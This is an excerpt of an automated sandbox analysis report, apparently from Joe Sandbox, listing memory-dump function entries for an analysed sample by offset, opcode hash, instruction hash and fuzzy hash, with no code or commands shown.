                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: M 0.$NT L
                                • API String ID: 0-1807112707
                                • Opcode ID: ae5b3c59428f6a3aa5001e7c8e07b2e4f8148e76bf90ef19fb1f54b66ffeef7c
                                • Instruction ID: ed8027c8f57c52dee96f8aae7aa2568158538dccd5477a85592957278b4f6abf
                                • Opcode Fuzzy Hash: ae5b3c59428f6a3aa5001e7c8e07b2e4f8148e76bf90ef19fb1f54b66ffeef7c
                                • Instruction Fuzzy Hash: 1F51C3B46203419BDB119F20C9C479AB7F8BF49304F14857DEC889B282D375EA94CB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: H
                                • API String ID: 0-2852464175
                                • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                • Instruction ID: 97c491ef2bd83470f1186eac4ee555a5a71f8fbde384f61ac5020b0aaff36477
                                • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                • Instruction Fuzzy Hash: 4A91C731B183118FCB18CE1CC4D066EB7E3ABCA314F1A857DD99A97391DE31AC568B85
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 368baef1a10b0a268d8a4133b4ca1ed6733b96ca73f99b1d8e50a5528e2e3c12
                                • Instruction ID: 005a5462d8ef4c0bb84151e156859135f64c00b3eceab0009ebd51f366dc996b
                                • Opcode Fuzzy Hash: 368baef1a10b0a268d8a4133b4ca1ed6733b96ca73f99b1d8e50a5528e2e3c12
                                • Instruction Fuzzy Hash: FAC18C75604B118FD724CF29E480A2ABBE2FF86314F148A2DE5AA87791D734F846CF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                • Instruction ID: f2d8ba0be223f601d11bf2afefa563d0c75de6c934d32f10918ccc0f400b9e04
                                • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                • Instruction Fuzzy Hash: 3CA11571A283024FC714CF2CC4C062AB7E6BFCA350F59866DE59597391EA34EC658B81
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03f6f01a4011d0c7d7b8426b05ab874b7f2965931f7e54cdbff1150a3691c223
                                • Instruction ID: 9ab7749718cff7291ca3c67ade76c90545d05bd492e6fd1ce9f1262806bbd355
                                • Opcode Fuzzy Hash: 03f6f01a4011d0c7d7b8426b05ab874b7f2965931f7e54cdbff1150a3691c223
                                • Instruction Fuzzy Hash: A4A1B335A101598FEF38DE25CC95BDA73A6EFC8310F1A8225EC599F3D1EA30AD058781
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b7696a5a184c2513336da0b92f76d4c2b957ed621e89b8219fcade6215329f1
                                • Instruction ID: cb60e223acb463002d747f9b6158fa3a144e4344f0241a95bb6efef5f87a6dc8
                                • Opcode Fuzzy Hash: 6b7696a5a184c2513336da0b92f76d4c2b957ed621e89b8219fcade6215329f1
                                • Instruction Fuzzy Hash: 17C10671914B419BD722CF38C881BE6F7E1BFD9300F609A1DE8EAA6241EB707594CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 283a5c7e10628906dd539a05e71f5f3d9d89a083dd00a6b424a8eae92aa761cd
                                • Instruction ID: 1d5e45f7baa12da525045f8e765dc2a990ffc63c1931b424717b197979d8ece5
                                • Opcode Fuzzy Hash: 283a5c7e10628906dd539a05e71f5f3d9d89a083dd00a6b424a8eae92aa761cd
                                • Instruction Fuzzy Hash: 4481D772D18B829BD3158F64C8906B6BBA0FFDA314F24DB1EE8E617742E7749580C781
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                • Instruction ID: a200279545d3107b74374f621f0bba9ce9d21a9dcb47ebf703792043528b7bb1
                                • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                • Instruction Fuzzy Hash: 8E31E6317083194BC714AD69C4D822AFAD3ABD8351F558B3EE985C33A1E9719C4D8682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: [
                                • API String ID: 0-784033777
                                • Opcode ID: 64b8eadc318f598afe648d870e8b1c1d59308a062414277a17b92d9bbed308ec
                                • Instruction ID: dee24e0a0ec329205d2c2444bcab11ebeb7b27d439b6a3a3ce4373805b6b677f
                                • Opcode Fuzzy Hash: 64b8eadc318f598afe648d870e8b1c1d59308a062414277a17b92d9bbed308ec
                                • Instruction Fuzzy Hash: E3B16AF16383437BDB358E20889C73ABBDDEB55308F18C92EE8C5D6181E765C8648B52